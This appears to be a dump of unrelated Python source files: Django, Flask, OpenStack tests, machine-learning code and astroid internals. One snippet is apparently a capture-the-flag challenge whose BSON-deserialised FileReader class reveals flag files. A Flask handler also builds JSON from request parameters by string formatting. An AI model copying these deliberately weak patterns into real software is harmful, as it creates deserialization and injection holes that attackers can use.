if 'all' in pods_and_scenarios:
pods_and_scenarios['all'].add(data['scenario'])
else:
pods_and_scenarios['all'] = {data['scenario']}
return pods_and_scenarios
def main():
KibanaConstructor().construct().config_js()
|
python
|
#!/home/ubuntu/DEF/PG/project/venv3/bin/python3
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
python
|
from .layers import *
|
python
|
import os
import json
class Config:
def __init__(self, configpath):
self._data = self._get_config_data(configpath)
self.client_id = self._data['client_id']
self.username = self._data['username']
self.account_id = self._data['account_id']
self.redirect = self._data['redirect']
self.allocations = self._data['allocations']
def _get_config_data(self, configpath):
return json.load(open(os.path.expandvars(configpath)))
|
python
|
class OpenL3Error(Exception):
"""The root OpenL3 exception class"""
pass
|
python
|
from aiogram.dispatcher.filters.state import State, StatesGroup
class AddStoreForm(StatesGroup):
city_id = State()
store_id = State()
class SearchSku(StatesGroup):
select_sku = State()
|
python
|
import os
import json
from flask import request, abort, jsonify, make_response, Response
from jsonschema import validate, ErrorTree, Draft4Validator as Validator
from app.properties import properties_bp
from .models import Property
from .repositories import PropertyRepository as Repository
from .utils import load
@properties_bp.route('/properties', methods=['POST'])
def create_properties():
if (not request.is_json):
abort(make_response(jsonify(message='Mime type is not valid'), 415))
else:
errors = Validator(load('schemas/property.schema')).iter_errors(request.get_json())
response_error = _errors(errors)
if (response_error):
resp = Response(response_error,
status=422,
mimetype="application/json")
return resp
else:
prop = Property(**request.get_json())
Repository.create(prop)
return jsonify(prop.as_dict()), 201
@properties_bp.route('/properties/<id>')
def find_property(id):
prop = Repository.find_by_id(id);
if (not prop):
message = 'Property id {} not found'.format(id)
abort(make_response(jsonify(message=message), 404))
return jsonify(prop.as_dict()), 200
@properties_bp.route('/properties')
def search_properties():
upper_x = request.args['ax']
upper_y = request.args['ay']
bottom_x = request.args['bx']
bottom_y = request.args['by']
params_json = '{"ax":%s, "ay":%s, "bx":%s, "by":%s }' % (upper_x, upper_y, bottom_x, bottom_y)
errors = Validator(load('schemas/filter.schema')).iter_errors(json.loads(params_json))
response_error = _errors(errors)
if (response_error):
resp = Response(response_error,
status=422,
mimetype="application/json")
return resp
result = Repository.find_properties(upper_x, bottom_x, bottom_y, upper_y)
if(not result):
message = 'No properties found with these coordinates'
abort(make_response(jsonify(message=message), 404))
else:
response = '{ "foundProperties": %s, "properties": %s }' % (len(result), json.dumps(result, ensure_ascii=False)) #, )
return Response(response,
status=200,
mimetype="application/json")
@properties_bp.errorhandler(400)
def bad_request(e):
return jsonify(error=400, text=str(e)), 400
def _errors(errors):
lista = []
response_error = ''
for error in errors:
msg = '{"field":"%s","message":"%s"}' % (''.join(error.path), error.message)
lista.append(msg)
if (lista):
response_error = '{"errors": [%s]}' % (','.join(lista))
return response_error
|
python
|
from .annotation_decorator import annotate
from .annotation_decorator import annotate_class
from .annotation_decorator import annotate_method
from .application import WinterApplication
from .component import Component
from .component import component
from .component import is_component
from .component_method import ComponentMethod
from .component_method import component_method
from .component_method_argument import ArgumentDoesNotHaveDefault
from .component_method_argument import ComponentMethodArgument
from .utils import cached_property
|
python
|
import sys
printf = lambda fmt,*args: sys.stdout.write(fmt%args)
printf ("This is a %s of %is of possibilities of %s","test",1000,printf)
|
python
|
#!/usr/bin/python
import pickle
import pandas as pd
import numpy as np
def convert_and_clean_data(data_dict, fill_na = 1.e-5):
'''
Takes a dataset as a dictionary, then converts it into a Pandas DataFrame for convenience.
Replaces all NA values by the value specified in 'fill_na' (or None).
Cleans up data errors on two observations.
Returns a Pandas DataFrame.
'''
# Convert to DataFrame
data_df = pd.DataFrame.from_dict(data_dict, orient = 'index', dtype = float)
if fill_na:
data_df = data_df.fillna(fill_na)
# Sort columns in correct order
column_names = ['poi', 'salary', 'bonus', 'long_term_incentive', 'deferred_income',
'deferral_payments', 'loan_advances','other', 'expenses', 'director_fees', 'total_payments',
'exercised_stock_options', 'restricted_stock', 'restricted_stock_deferred', 'total_stock_value',
'from_messages', 'to_messages', 'from_poi_to_this_person', 'from_this_person_to_poi',
'shared_receipt_with_poi']
data_df = data_df[column_names]
# Correct two data errors
# Robert Belfer: Data shifted right by one column
for j in xrange(1, 14):
data_df.ix['BELFER ROBERT', j] = data_df.ix['BELFER ROBERT', j + 1]
data_df.ix['BELFER ROBERT', 14] = 1.e-5
# Sanjay Bhatnagar: Data shifted left by one column
for j in xrange(14, 2, -1):
data_df.ix['BHATNAGAR SANJAY', j] = data_df.ix['BHATNAGAR SANJAY', j - 1]
data_df.ix['BHATNAGAR SANJAY', 1] = 1.e-5
return data_df
def drop_outliers(data_df, outliers):
'''
'outliers' is a list of indexes for observations to be dropped.
'''
data_df = data_df.drop(outliers)
return data_df
def create_new_features(data_df, log_columns):
'''
Creates new email-related features by aggregating some of the existing ones.
Applies log transformation to the specified list of features.
'''
# Create 3 aggregate email features to help reduce dimensionality
data_df.loc[:, 'sent_vs_received'] = 1. * data_df.loc[:, 'from_messages'] / \
data_df.loc[:, 'to_messages']
data_df.loc[:, 'total_emails'] = data_df.loc[:, 'from_messages'] + data_df.loc[:, 'to_messages']
data_df.loc[:, 'emails_with_poi'] = data_df.loc[:, 'from_this_person_to_poi'] + \
data_df.loc[:, 'from_poi_to_this_person'] + data_df.loc[:, 'shared_receipt_with_poi']
# Create log-transformed features from the features in list to make data look closer to normal
for col in log_columns:
# Some of the financial data is negative, which causes undefined values with log. Take abs:
data_df.loc[:, 'log_' + col] = np.log(np.abs(data_df.loc[:, col]))
return data_df
log_columns = ['bonus', 'deferred_income', 'long_term_incentive', 'other',
'restricted_stock_deferred', 'total_stock_value']
features_list = ['poi', 'salary', 'bonus', 'long_term_incentive', 'deferred_income',
'deferral_payments', 'loan_advances','other', 'expenses', 'director_fees', 'total_payments',
'exercised_stock_options', 'restricted_stock', 'restricted_stock_deferred',
'total_stock_value', 'from_messages', 'to_messages', 'from_poi_to_this_person',
'from_this_person_to_poi', 'shared_receipt_with_poi']
|
python
|
SIZE = (640,480)
TITLE = "Pipboy"
TEXT_COLOUR = (0,255,0)
TEXT_SIZE = 12
TEXT_FONT = '../resources/monofonto.ttf'
BOARDER_SPACE = 10
TOP_BOARDER = 6
BOX_SPACE = 20
|
python
|
import os
import sys
import copy
import argparse
from avalon import io
from avalon.tools import publish
import pyblish.api
import pyblish.util
from pype.api import Logger
import pype
import pype.hosts.celaction
from pype.hosts.celaction import api as celaction
log = Logger().get_logger("Celaction_cli_publisher")
publish_host = "celaction"
HOST_DIR = os.path.dirname(os.path.abspath(pype.hosts.celaction.__file__))
PLUGINS_DIR = os.path.join(HOST_DIR, "plugins")
PUBLISH_PATH = os.path.join(PLUGINS_DIR, "publish")
LOAD_PATH = os.path.join(PLUGINS_DIR, "load")
CREATE_PATH = os.path.join(PLUGINS_DIR, "create")
INVENTORY_PATH = os.path.join(PLUGINS_DIR, "inventory")
def cli():
parser = argparse.ArgumentParser(prog="celaction_publish")
parser.add_argument("--currentFile",
help="Pass file to Context as `currentFile`")
parser.add_argument("--chunk",
help=("Render chanks on farm"))
parser.add_argument("--frameStart",
help=("Start of frame range"))
parser.add_argument("--frameEnd",
help=("End of frame range"))
parser.add_argument("--resolutionWidth",
help=("Width of resolution"))
parser.add_argument("--resolutionHeight",
help=("Height of resolution"))
celaction.kwargs = parser.parse_args(sys.argv[1:]).__dict__
def _prepare_publish_environments():
"""Prepares environments based on request data."""
env = copy.deepcopy(os.environ)
project_name = os.getenv("AVALON_PROJECT")
asset_name = os.getenv("AVALON_ASSET")
io.install()
project_doc = io.find_one({
"type": "project"
})
av_asset = io.find_one({
"type": "asset",
"name": asset_name
})
parents = av_asset["data"]["parents"]
hierarchy = ""
if parents:
hierarchy = "/".join(parents)
env["AVALON_PROJECT"] = project_name
env["AVALON_ASSET"] = asset_name
env["AVALON_TASK"] = os.getenv("AVALON_TASK")
env["AVALON_WORKDIR"] = os.getenv("AVALON_WORKDIR")
env["AVALON_HIERARCHY"] = hierarchy
env["AVALON_PROJECTCODE"] = project_doc["data"].get("code", "")
env["AVALON_APP"] = f"hosts.{publish_host}"
env["AVALON_APP_NAME"] = "celaction_local"
env["PYBLISH_HOSTS"] = publish_host
os.environ.update(env)
def main():
# prepare all environments
_prepare_publish_environments()
# Registers pype's Global pyblish plugins
pype.install()
if os.path.exists(PUBLISH_PATH):
log.info(f"Registering path: {PUBLISH_PATH}")
pyblish.api.register_plugin_path(PUBLISH_PATH)
pyblish.api.register_host(publish_host)
return publish.show()
if __name__ == "__main__":
cli()
result = main()
sys.exit(not bool(result))
|
python
|
# Copyright 2018 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Encapsulate octavia testing."""
import logging
import subprocess
import tenacity
import zaza.openstack.charm_tests.test_utils as test_utils
import zaza.openstack.utilities.openstack as openstack_utils
class CharmOperationTest(test_utils.OpenStackBaseTest):
"""Charm operation tests."""
@classmethod
def setUpClass(cls):
"""Run class setup for running Octavia charm operation tests."""
super(CharmOperationTest, cls).setUpClass()
def test_pause_resume(self):
"""Run pause and resume tests.
Pause service and check services are stopped, then resume and check
they are started.
"""
self.pause_resume(['apache2'])
class LBAASv2Test(test_utils.OpenStackBaseTest):
"""LBaaSv2 service tests."""
@classmethod
def setUpClass(cls):
"""Run class setup for running LBaaSv2 service tests."""
super(LBAASv2Test, cls).setUpClass()
def test_create_loadbalancer(self):
"""Create load balancer."""
keystone_session = openstack_utils.get_overcloud_keystone_session()
neutron_client = openstack_utils.get_neutron_session_client(
keystone_session)
nova_client = openstack_utils.get_nova_session_client(
keystone_session)
# Get IP of the prepared payload instances
payload_ips = []
for server in nova_client.servers.list():
payload_ips.append(server.networks['private'][0])
self.assertTrue(len(payload_ips) > 0)
resp = neutron_client.list_networks(name='private')
subnet_id = resp['networks'][0]['subnets'][0]
if openstack_utils.dvr_enabled():
resp = neutron_client.list_networks(name='private_lb_fip_network')
vip_subnet_id = resp['networks'][0]['subnets'][0]
else:
vip_subnet_id = subnet_id
octavia_client = openstack_utils.get_octavia_session_client(
keystone_session)
result = octavia_client.load_balancer_create(
json={
'loadbalancer': {
'description': 'Created by Zaza',
'admin_state_up': True,
'vip_subnet_id': vip_subnet_id,
'name': 'zaza-lb-0',
}})
lb_id = result['loadbalancer']['id']
lb_vip_port_id = result['loadbalancer']['vip_port_id']
@tenacity.retry(wait=tenacity.wait_fixed(1),
reraise=True, stop=tenacity.stop_after_delay(900))
def wait_for_lb_resource(octavia_show_func, resource_id,
operating_status=None):
resp = octavia_show_func(resource_id)
logging.info(resp['provisioning_status'])
assert resp['provisioning_status'] == 'ACTIVE', (
'load balancer resource has not reached '
'expected provisioning status: {}'
.format(resp))
if operating_status:
logging.info(resp['operating_status'])
assert resp['operating_status'] == operating_status, (
'load balancer resource has not reached '
'expected operating status: {}'.format(resp))
return resp
logging.info('Awaiting loadbalancer to reach provisioning_status '
'"ACTIVE"')
resp = wait_for_lb_resource(octavia_client.load_balancer_show, lb_id)
logging.info(resp)
result = octavia_client.listener_create(
json={
'listener': {
'loadbalancer_id': lb_id,
'name': 'listener1',
'protocol': 'HTTP',
'protocol_port': 80
},
})
listener_id = result['listener']['id']
logging.info('Awaiting listener to reach provisioning_status '
'"ACTIVE"')
resp = wait_for_lb_resource(octavia_client.listener_show, listener_id)
logging.info(resp)
result = octavia_client.pool_create(
json={
'pool': {
'listener_id': listener_id,
'name': 'pool1',
'lb_algorithm': 'ROUND_ROBIN',
'protocol': 'HTTP',
},
})
pool_id = result['pool']['id']
logging.info('Awaiting pool to reach provisioning_status '
'"ACTIVE"')
resp = wait_for_lb_resource(octavia_client.pool_show, pool_id)
logging.info(resp)
result = octavia_client.health_monitor_create(
json={
'healthmonitor': {
'pool_id': pool_id,
'delay': 5,
'max_retries': 4,
'timeout': 10,
'type': 'HTTP',
'url_path': '/',
},
})
healthmonitor_id = result['healthmonitor']['id']
logging.info('Awaiting healthmonitor to reach provisioning_status '
'"ACTIVE"')
resp = wait_for_lb_resource(octavia_client.health_monitor_show,
healthmonitor_id)
logging.info(resp)
for ip in payload_ips:
result = octavia_client.member_create(
pool_id=pool_id,
json={
'member': {
'subnet_id': subnet_id,
'address': ip,
'protocol_port': 80,
},
})
member_id = result['member']['id']
logging.info('Awaiting member to reach provisioning_status '
'"ACTIVE"')
resp = wait_for_lb_resource(
lambda x: octavia_client.member_show(
pool_id=pool_id, member_id=x),
member_id,
operating_status='ONLINE')
logging.info(resp)
lb_fp = openstack_utils.create_floating_ip(
neutron_client, 'ext_net', port={'id': lb_vip_port_id})
@tenacity.retry(wait=tenacity.wait_fixed(1),
reraise=True, stop=tenacity.stop_after_delay(900))
def get_payload():
return subprocess.check_output(
['wget', '-O', '-',
'http://{}/'.format(lb_fp['floating_ip_address'])],
universal_newlines=True)
snippet = 'This is the default welcome page'
assert snippet in get_payload()
logging.info('Found "{}" in page retrieved through load balancer at '
'"http://{}/"'
.format(snippet, lb_fp['floating_ip_address']))
|
python
|
import numpy as np;
import numpy.matlib as npm;
import DataHelper;
# consume class is 0, 1, ..., discrete feature values is 0, 1, 2, ...
class NaiveBayes:
def __init__(self, smoothingFactor):
self.__smoothingFactor = smoothingFactor;
self.__discreteFeatureIndices = None;
self.__discreteFeatureValueNumbers = None;
self.__continuousFeatureIndices = None;
self.__classProbability = None;
self.__discreteFeatureProbability = None;
self.__continuousFeatureArguments = None;
def __calcDiscreteProbability(self, dataSet, featureValueNumbers):
if dataSet is None:
return np.log(np.mat(np.ones((featureValueNumbers.max(), featureValueNumbers.shape[1]))) / featureValueNumbers);
frequency = None;
count = dataSet.shape[0];
result = np.mat(np.zeros((featureValueNumbers.max(), dataSet.shape[1])));
for i in range(0, result.shape[1]):
frequency = DataHelper.statisticFrequency(dataSet[:, i]);
result[:, i] = np.mat([np.log(((frequency[key] if key in frequency else 0) + self.__smoothingFactor) / (count + featureValueNumbers[0, i] * self.__smoothingFactor)) if key < featureValueNumbers[0, i] else np.nan for key in range(0, result.shape[0])]).T;
return result;
def __calcContinuousArguments(self, dataSet, featureCount):
return np.vstack((dataSet.mean(axis = 0), dataSet.std(axis = 0))) if dataSet is not None else np.mat(np.zeros((2, featureCount)));
def train(self, dataSet, featureValueNumbers):
if dataSet is None or not isinstance(dataSet, np.matrix) or featureValueNumbers is None or not isinstance(featureValueNumbers, np.matrix):
raise ValueError();
self.__discreteFeatureIndices = np.where(featureValueNumbers.A.flatten() > 0)[0];
self.__continuousFeatureIndices = np.where(featureValueNumbers.A.flatten() <= 0)[0];
if len(self.__discreteFeatureIndices) > 0:
self.__discreteFeatureValueNumbers = featureValueNumbers[np.where(featureValueNumbers > 0)];
classSets = DataHelper.groupBy(dataSet, -1);
classCount = int(max(classSets.keys())) + 1;
self.__classProbability = np.mat([np.log(((classSets[key].shape[0] if key in classSets else 0) + self.__smoothingFactor) / (dataSet.shape[0] + classCount * self.__smoothingFactor)) for key in range(0, classCount)]);
self.__discreteFeatureProbability = list(range(0, classCount));
self.__continuousFeatureArguments = list(range(0, classCount));
for key in range(0, classCount):
if len(self.__discreteFeatureIndices) > 0:
self.__discreteFeatureProbability[key] = self.__calcDiscreteProbability(classSets[key][:, self.__discreteFeatureIndices] if key in classSets else None, self.__discreteFeatureValueNumbers);
if len(self.__continuousFeatureIndices) > 0:
self.__continuousFeatureArguments[key] = self.__calcContinuousArguments(classSets[key][:, self.__continuousFeatureIndices] if key in classSets else None, len(self.__continuousFeatureIndices));
def predict(self, dataSet):
if dataSet is None or not isinstance(dataSet, np.matrix):
raise ValueError();
discreteRange = None;
discreteSet, continuousSet = None, None;
allProbability, discreteProbability, continuousProbability = None, None, None;
result = np.mat(np.zeros((dataSet.shape[0], self.__classProbability.shape[1])));
if len(self.__discreteFeatureIndices) > 0:
discreteSet = dataSet[:, self.__discreteFeatureIndices];
discreteRange = list(range(0, len(self.__discreteFeatureIndices)));
if len(self.__continuousFeatureIndices) > 0:
continuousSet = dataSet[:, self.__continuousFeatureIndices];
for c in range(0, result.shape[1]):
if discreteSet is not None:
discreteProbability = self.__discreteFeatureProbability[c][np.mat(discreteSet, dtype = int), discreteRange];
if continuousSet is not None:
normalArguments = self.__continuousFeatureArguments[c];
mean, var, std = normalArguments[0, :], np.power(normalArguments[1, :], 2), normalArguments[1, :];
zeroStdIndices = np.where(std == 0)[1];
if len(zeroStdIndices) > 0:
var[:, zeroStdIndices] = 1;
std[:, zeroStdIndices] = 1;
continuousProbability = np.power(continuousSet - mean, 2) / (-2 * var) - np.log(std);
if len(zeroStdIndices) > 0:
continuousProbability[:, zeroStdIndices] = 0;
if discreteSet is not None and continuousSet is not None:
allProbability = np.hstack((discreteProbability, continuousProbability));
elif discreteSet is not None:
allProbability = discreteProbability;
else:
allProbability = continuousProbability;
result[:, c] = allProbability.sum(1);
result = result + self.__classProbability;
return np.mat(result.argmax(axis = 1));
|
python
|
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/main/LICENSE
# Copyright (c) https://github.com/PyCQA/astroid/blob/main/CONTRIBUTORS.txt
"""This module contains mixin classes for scoped nodes."""
from typing import TYPE_CHECKING, Dict, List, TypeVar
from astroid.filter_statements import _filter_stmts
from astroid.nodes import node_classes, scoped_nodes
from astroid.nodes.scoped_nodes.utils import builtin_lookup
if TYPE_CHECKING:
from astroid import nodes
_T = TypeVar("_T")
class LocalsDictNodeNG(node_classes.LookupMixIn, node_classes.NodeNG):
"""this class provides locals handling common to Module, FunctionDef
and ClassDef nodes, including a dict like interface for direct access
to locals information
"""
# attributes below are set by the builder module or by raw factories
locals: Dict[str, List["nodes.NodeNG"]] = {}
"""A map of the name of a local variable to the node defining the local."""
def qname(self):
"""Get the 'qualified' name of the node.
For example: module.name, module.class.name ...
:returns: The qualified name.
:rtype: str
"""
# pylint: disable=no-member; github.com/pycqa/astroid/issues/278
if self.parent is None:
return self.name
return f"{self.parent.frame(future=True).qname()}.{self.name}"
def scope(self: _T) -> _T:
"""The first parent node defining a new scope.
:returns: The first parent scope node.
:rtype: Module or FunctionDef or ClassDef or Lambda or GenExpr
"""
return self
def _scope_lookup(self, node, name, offset=0):
"""XXX method for interfacing the scope lookup"""
try:
stmts = _filter_stmts(node, self.locals[name], self, offset)
except KeyError:
stmts = ()
if stmts:
return self, stmts
# Handle nested scopes: since class names do not extend to nested
# scopes (e.g., methods), we find the next enclosing non-class scope
pscope = self.parent and self.parent.scope()
while pscope is not None:
if not isinstance(pscope, scoped_nodes.ClassDef):
return pscope.scope_lookup(node, name)
pscope = pscope.parent and pscope.parent.scope()
# self is at the top level of a module, or is enclosed only by ClassDefs
return builtin_lookup(name)
def set_local(self, name, stmt):
"""Define that the given name is declared in the given statement node.
.. seealso:: :meth:`scope`
:param name: The name that is being defined.
:type name: str
:param stmt: The statement that defines the given name.
:type stmt: NodeNG
"""
# assert not stmt in self.locals.get(name, ()), (self, stmt)
self.locals.setdefault(name, []).append(stmt)
__setitem__ = set_local
def _append_node(self, child):
"""append a child, linking it in the tree"""
# pylint: disable=no-member; depending by the class
# which uses the current class as a mixin or base class.
# It's rewritten in 2.0, so it makes no sense for now
# to spend development time on it.
self.body.append(child)
child.parent = self
def add_local_node(self, child_node, name=None):
"""Append a child that should alter the locals of this scope node.
:param child_node: The child node that will alter locals.
:type child_node: NodeNG
:param name: The name of the local that will be altered by
the given child node.
:type name: str or None
"""
if name != "__class__":
# add __class__ node as a child will cause infinite recursion later!
self._append_node(child_node)
self.set_local(name or child_node.name, child_node)
def __getitem__(self, item):
"""The first node the defines the given local.
:param item: The name of the locally defined object.
:type item: str
:raises KeyError: If the name is not defined.
"""
return self.locals[item][0]
def __iter__(self):
"""Iterate over the names of locals defined in this scoped node.
:returns: The names of the defined locals.
:rtype: iterable(str)
"""
return iter(self.keys())
def keys(self):
"""The names of locals defined in this scoped node.
:returns: The names of the defined locals.
:rtype: list(str)
"""
return list(self.locals.keys())
def values(self):
"""The nodes that define the locals in this scoped node.
:returns: The nodes that define locals.
:rtype: list(NodeNG)
"""
# pylint: disable=consider-using-dict-items
# It look like this class override items/keys/values,
# probably not worth the headache
return [self[key] for key in self.keys()]
def items(self):
"""Get the names of the locals and the node that defines the local.
:returns: The names of locals and their associated node.
:rtype: list(tuple(str, NodeNG))
"""
return list(zip(self.keys(), self.values()))
def __contains__(self, name):
"""Check if a local is defined in this scope.
:param name: The name of the local to check for.
:type name: str
:returns: True if this node has a local of the given name,
False otherwise.
:rtype: bool
"""
return name in self.locals
class ComprehensionScope(LocalsDictNodeNG):
"""Scoping for different types of comprehensions."""
scope_lookup = LocalsDictNodeNG._scope_lookup
|
python
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-07-14 12:19
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Capability',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('actuator', models.CharField(max_length=200)),
('action', models.CharField(max_length=50)),
('remote_id', models.IntegerField()),
('remote_name', models.CharField(max_length=200)),
('active', models.BooleanField(default=True)),
],
),
migrations.CreateModel(
name='CybOXType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('identifier', models.CharField(max_length=50)),
('template', models.TextField(default='{}', max_length=1000)),
],
),
migrations.CreateModel(
name='Job',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('raw_message', models.TextField(max_length=5000)),
('created_at', models.DateTimeField(blank=True, default=django.utils.timezone.now)),
('sent_at', models.DateTimeField(blank=True, null=True)),
('upstream_respond_to', models.CharField(max_length=5000, null=True)),
('upstream_command_ref', models.CharField(max_length=100, null=True)),
('capability', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reactor_master.Capability')),
('created_by', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='JobStatus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.CharField(max_length=40)),
],
),
migrations.CreateModel(
name='Relay',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('url', models.CharField(max_length=400)),
('username', models.CharField(blank=True, max_length=200, null=True)),
('password', models.CharField(blank=True, max_length=200, null=True)),
],
),
migrations.CreateModel(
name='Response',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('raw_message', models.CharField(max_length=5000)),
('created_at', models.DateTimeField(blank=True, default=django.utils.timezone.now)),
('job', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reactor_master.Job')),
],
),
migrations.CreateModel(
name='Target',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=140)),
('raw_message', models.TextField(max_length=500)),
('cybox_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reactor_master.CybOXType')),
],
),
migrations.AddField(
model_name='job',
name='status',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reactor_master.JobStatus'),
),
migrations.AddField(
model_name='job',
name='target',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reactor_master.Target'),
),
migrations.AddField(
model_name='capability',
name='requires',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reactor_master.CybOXType'),
),
migrations.AddField(
model_name='capability',
name='via',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reactor_master.Relay'),
),
]
|
python
|
>>> 3
3
>>> _*_, _**0.5
(9, 1.7320508075688772)
>>>
|
python
|
import bson
import os, base64, zlib, random
from bson import BSONCoding, import_class
class Member(BSONCoding):
def __init__(self, username = "", code = "00", password = ""):
self.username = username
self.code = code
self.password = password
def __str__(self):
display = "Username : \nCode : \nPassword : "
if isinstance(self.username, basestring) and isinstance(self.code, basestring) and isinstance(self.password, basestring):
display = "Username : " + str(self.username) + "\nCode : " + str(self.code) + "\nPassword : " + str(self.password)
return display
def bson_encode(self):
return {"username": self.username, "code": self.code, "password": self.password}
def bson_init(self, raw_values):
self.username = raw_values["username"]
self.code = raw_values["code"]
self.password = raw_values["password"]
def __eq__(self, other):
if not isinstance(other, Member):
return NotImplemented
if self.username != other.code:
return False
if self.code != other.code:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
class FileReader(BSONCoding):
def __init__(self, file_name):
self.filename = file_name
self._id = random.randint(0, 2000)
def __str__(self):
if isinstance(self.filename, basestring) and (self.filename.__eq__('oold_flag.py') or self.filename.__eq__('new_flag.py')):
fh = open('utils/'+self.filename,'r')
display = "File Id: " + str(self._id) + \
"\n==========================================\n" + \
fh.read()
fh.close()
return display
else:
return "File Id: " + str(self._id) + \
"\n==========================================\n"
def bson_encode(self):
return {"filename": self.filename, "_id": self._id}
def bson_init(self, raw_values):
self.filename = raw_values["filename"]
self._id = raw_values["_id"]
def __eq__(self, other):
if not isinstance(other, FileReader):
return NotImplemented
if self.filename != other.filename:
return False
if self._id != other._id:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
# import serpy, json, os
# import random, pickle, base64
# class Member(object):
# username = ""
# code = 0
# password = ""
# def __init__(self, username = "", code = 0, password = ""):
# self.username = username
# self.code = code
# self.password = password
# def __str__(self):
# display = "Username : " + self.username + "\nCode : " + str(self.code) + "\nPassword : " + self.password
# return display
# class FileReader(object):
# _id = 0
# filename = ""
# def __init__(self, file_name):
# self.filename = file_name
# self._id = random.randint(0, 2000)
# def __str__(self):
# if self.filename in ["utils/oold_flag.py", "utils/new_flag.py"]:
# return "File Id: " + str(self._id) + "\n==========================================\n" + open(self.filename).read()
# else:
# return "File Id: " + str(self._id) + "\n==========================================\n"
# class FileReaderSerializer(serpy.Serializer):
# Id = serpy.Field(attr="_id")
# filename = serpy.Field(attr="filename")
# file = serpy.MethodField()
# def get_file(self, obj):
# return obj.__str__()
# class MemberSerializer(serpy.Serializer):
# username = serpy.Field(attr='username')
# code = serpy.Field(attr='code')
# password = serpy.Field(attr='password')
# member = serpy.MethodField()
# def get_member(self, obj):
# return obj.__str__()
|
python
|
# library/package semantic version
__api_version__ = '1.4'
__generation__ = 1
|
python
|
from math import (
sin,
cos,
tan,
acos,
radians,
degrees,
)
from datetime import (
timedelta,
)
def earth_declination(n):
return 23.45 * sin(radians(360/365 * (284+n)))
def td(lat):
dec = earth_declination(119) #TODO Change this literal
cofactor = -(tan(radians(lat)) * tan(radians(dec)))
return 2/15 * degrees(acos(cofactor))
def longitude_correction(lng, fuse):
diff = lng - fuse
return timedelta(
minutes=(diff * 60) / 15
)
def day_range(td, lng, fuse):
td /= 2
sunrise = timedelta(hours=12-td)
sunset = timedelta(hours=12+td)
correction = longitude_correction(lng, fuse)
sunrise += correction
sunset += correction
return (sunrise, sunset)
lat = -23.543333
lng = 46.633056
fuse = 45
td = td(lat)
sunrise, sunset = day_range(td, lng, fuse)
|
python
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Test app."""
from __future__ import absolute_import
import pytest
from flask import Flask
from invenio_oaiserver import InvenioOAIServer
def test_version():
"""Test version import."""
from invenio_oaiserver import __version__
assert __version__
def test_init():
"""Test extension initialization."""
app = Flask('testapp')
with pytest.warns(None):
InvenioOAIServer(app)
|
python
|
'''
Tests for the lookup module.
'''
import sys
import unittest
from io import StringIO
from unittest.mock import patch
from modules import rec_lookup
sys.path.insert(0, "0_1_0/")
class TestLookup(unittest.TestCase):
'''Lokup Tests'''
def setUp(self):
self.nodes_json = StringIO(
'''[
{
"id": 1,
"name": "Test Node",
"mac": "0011223344556677",
"tool": false,
"door": false,
"qr_toggle": false,
"hub": 1,
"facility": "7659e76b-470c-4d5f-bff4-fcc120f08848",
"qr_code": null
}
]'''
)
self.nodes_alternative_json = StringIO(
'''[
{
"id": 1,
"name": "Test Node",
"mac": "0000000000000000",
"tool": false,
"door": false,
"qr_toggle": false,
"hub": 1,
"facility": "7659e76b-470c-4d5f-bff4-fcc120f08848",
"qr_code": null
}
]'''
)
self.nodes_empty_json = StringIO('')
def test_count_matching_mac(self):
'''
Confirms MAC conflection is counted correctly.
'''
count_result = rec_lookup.count_matching_mac("12345678")
self.assertEqual(count_result, 0)
self.assertEqual(
rec_lookup.count_matching_mac("0011223344556677"),
0
)
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.nodes_json
count_result = rec_lookup.count_matching_mac("0011223344556677")
mock_open.assert_called()
self.assertEqual(count_result, 1)
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.nodes_alternative_json
count_result = rec_lookup.count_matching_mac("0011223344556677")
mock_open.assert_called()
self.assertEqual(count_result, 0)
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.nodes_empty_json
self.assertEqual(
rec_lookup.count_matching_mac("0011223344556677"),
0
)
mock_open.assert_called()
class TestLookUpAccessRequest(unittest.TestCase): # pylint: disable=R0904
'''Access Request Tests'''
def setUp(self):
